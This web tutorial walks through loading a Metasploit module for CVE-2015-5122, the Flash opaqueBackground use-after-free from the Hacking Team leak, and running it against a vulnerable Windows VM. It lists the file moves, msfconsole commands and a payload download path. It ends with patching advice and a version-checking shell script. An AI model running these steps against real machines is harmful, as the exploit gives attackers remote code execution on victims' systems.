
Metasploit CVE-2015-5122 Flash Exploit Tutorial

In this tutorial we will import the CVE-2015-5122 (Adobe Flash opaqueBackground Use After Free) zero-day Flash exploit module into Metasploit and have a vulnerable setup download the malicious Flash file. Recent versions of Adobe Flash Player contain critical vulnerabilities within the ActionScript 3 ByteArray, opaqueBackground and BitmapData classes. Exploiting one of these vulnerabilities could allow a remote attacker to execute arbitrary code on the vulnerable system. CVE-2015-5122 is the 3rd zero-day exploit from the Hacking Team data breach and targets Adobe Flash Player (18.0.0.203) on Windows 7, Windows 8.1 and Google Chrome on Linux-based computers. At the time of writing, Adobe has already released security updates for Windows, Mac and Linux. This tutorial is for informational purposes only.

The Metasploit framework is a collection of tools and libraries that can be used to test the security of systems and networks. It is often used by security professionals to identify and exploit vulnerabilities in systems as part of a penetration testing or ethical hacking engagement.

An exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).

A “Flash exploit” specifically refers to a vulnerability in Adobe Flash Player, a software application that is used to view multimedia content and run applications on the web. Flash exploits allow an attacker to execute arbitrary code on a user’s system through a vulnerability in the Flash Player software.

It is important to note that the use of the Metasploit framework and other similar tools should only be done with the explicit permission of the owner of the systems being tested, and all testing should be conducted in a controlled and authorized manner. The Metasploit framework is a powerful tool that can be used for both legitimate and malicious purposes, so it is important to use it responsibly and ethically.

 

Metasploit CVE-2015-5122 Tutorial

First download the exploit code and make it available to Metasploit by creating an empty document and naming it:

Adobe_Flash_HackingTeam_exploit.rb

Then download the payload here:

https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2015-5122

And add it to the following directory:

/usr/share/metasploit-framework/data/exploits/CVE-2015-5119/msf.swf

Now copy the exploit code and paste it into the document.


Use the following command to move the file from the desktop to the Metasploit modules folder (create the flash folder first if needed):

mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/

Use the following command to check if the file has been actually copied to the destination folder:

ls /usr/share/metasploit-framework/modules/exploits/windows/flash/


Let’s open a new terminal and start Metasploit (and services if not already started) using the following command(s):

service postgresql start
service metasploit start
msfconsole


Now that we’ve got Metasploit up and running with our newly imported exploit loaded, we use the following command to search for it:

search hackingteam

Now use the following command to use the newly added exploit:

use exploit/windows/flash/Adobe_Flash_HackingTeam_exploit

Let’s check the options for Metasploit CVE-2015-5122 module with the following command:

show options


We will keep the default options and type “run” or “exploit” to start the exploit:

exploit


Let’s open the link from a Windows 8.1 virtual machine with a vulnerable browser (Firefox) and a vulnerable version of Flash Player (18.0.0.203) installed.


How to avoid getting infected by CVE-2015-5122 and other exploits…

– Update Flash Player and keep it up-to-date.
– Install security patches and keep your OS up-to-date.
– Install a virus scanner and firewall and keep it updated.
– Keep your browser up-to-date.
– Do not install unneeded plug-ins.
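
To act on the first item in the list above across more than one machine, the following shell script (an added example, not part of the original tutorial) flags hosts whose Flash Player version is at or below 18.0.0.203, the version this page names as targeted. The host names, the "host version" inventory format and treating every earlier version as needing the update are assumptions of the example.

```shell
#!/bin/sh
# Added example (not from the original tutorial): triage a Flash Player
# inventory against the version this page names as targeted.
TARGETED="18.0.0.203"   # from the page; "at or below" is this example's assumption

# is_version V: succeed only for dotted numeric strings such as 18.0.0.203.
is_version() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
        *) return 0 ;;
    esac
}

# ver_le A B: succeed if A <= B, comparing each dotted field as a number
# (a plain string comparison would wrongly rank 9.x above 18.x).
ver_le() {
    a=$1 b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        fa=${a%%.*}; fb=${b%%.*}
        [ "$a" = "$fa" ] && a="" || a=${a#*.}
        [ "$b" = "$fb" ] && b="" || b=${b#*.}
        fa=${fa:-0}; fb=${fb:-0}
        [ "$fa" -lt "$fb" ] && return 0
        [ "$fa" -gt "$fb" ] && return 1
    done
    return 0
}

# triage: read "host version" lines on stdin, print one verdict per host.
triage() {
    while read -r host ver rest; do
        case $host in ''|\#*) continue ;; esac
        if ! is_version "$ver"; then
            echo "UNKNOWN $host"
        elif ver_le "$ver" "$TARGETED"; then
            echo "UPDATE $host $ver"
        else
            echo "OK $host $ver"
        fi
    done
}

# Constructed sample inventory (hypothetical host names and versions).
sample_inventory() {
    printf '%s\n' "ws-01 18.0.0.203" "ws-02 18.0.0.194" \
        "ws-03 9.0.124.0" "ws-04 18.0.1.0" "ws-05 n/a"
}

sample_inventory | triage
```

Hosts reported as UNKNOWN had no parseable version in the inventory and should be checked by hand rather than assumed to be patched.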